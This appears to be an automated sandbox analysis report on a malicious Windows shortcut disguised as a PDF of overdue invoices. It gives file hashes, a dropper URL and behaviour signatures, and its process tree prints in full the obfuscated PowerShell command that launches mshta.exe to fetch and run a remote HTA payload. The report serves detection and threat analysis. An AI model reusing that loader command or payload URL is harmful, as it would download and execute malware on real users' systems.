Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
17-08-2022 07:11
General
-
Target
FACTURAS VENCIDAS.pdf.lnk
-
Size
4KB
-
MD5
321240e769016fa53af40cb6ab98cc0d
-
SHA1
44b6143d5ec750d11f38d311622ef849b8ec5178
-
SHA256
517b9d73ba6d6fd29ef0e008a01b11487c9217e466e17bb073a05412b3932e5b
-
SHA512
b8189176905d269d0135267ac47ac30f140ab76cb8ae5025250691f99f6b8ae186d05bad3bee3521726d6dc4f14f25cca3235aebcd9a9f56c8b8e93eb52e86dd
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://movilidadvialcolombia.com/envios.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\FACTURAS VENCIDAS.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $RmOQa='oaaviioo.ai:loavstm.nl/daoMcbHhemdihvpTlmttslsc//i'; &(-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])) :\ (-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])); :\ ^* (-join($RmOQa[(-49742+49760),(25567-25551),(-65481+65510),(-31827+31844),(-5690+5691)])); foreach($bxcdxk in @((-7238+7268),(15062-15045),(12459-12442),(60614-60577),(-27262+27278),(-16356+16367),(-59583+59605),(-38422+38444),(4418-4400),(-45458+45458),(-8330+8333),(53548-53544),(31137-31125),(-32813+32817),(10370-10347),(2734-2733),(32919-32896),(-55404+55407),(25253-25249),(-60232+60233),(-22204+22216),(-3617+3644),(-25191+25191),(16991-16979),(-56149+56149),(-64411+64429),(-33829+33857),(25970-25966),(-29913+29914),(28759-28751),(-21336+21363),(29847-29847),(16247-16229),(-50154+50176),(-35833+35864),(-60816+60836),(54974-54971),(-1453+1457),(21056-21056),(30922-30906),(25154-25146),(39267-39237),(54694-54677),(-5241+5242))) {$nxFNKh+= $RmOQa[$bxcdxk]}; ^* $nxFNKh;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://movilidadvialcolombia.com/envios.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/980-96-0x0000000000000000-mapping.dmp
-
memory/1184-88-0x0000000000000000-mapping.dmp
-
memory/1184-93-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmpFilesize
10.1MB
-
memory/1184-95-0x0000000002344000-0x0000000002347000-memory.dmpFilesize
12KB
-
memory/1184-94-0x000007FEF3390000-0x000007FEF3EED000-memory.dmpFilesize
11.4MB
-
memory/1184-97-0x0000000002344000-0x0000000002347000-memory.dmpFilesize
12KB
-
memory/1184-98-0x000000000234B000-0x000000000236A000-memory.dmpFilesize
124KB
-
memory/2040-54-0x000007FEFBB81000-0x000007FEFBB83000-memory.dmpFilesize
8KB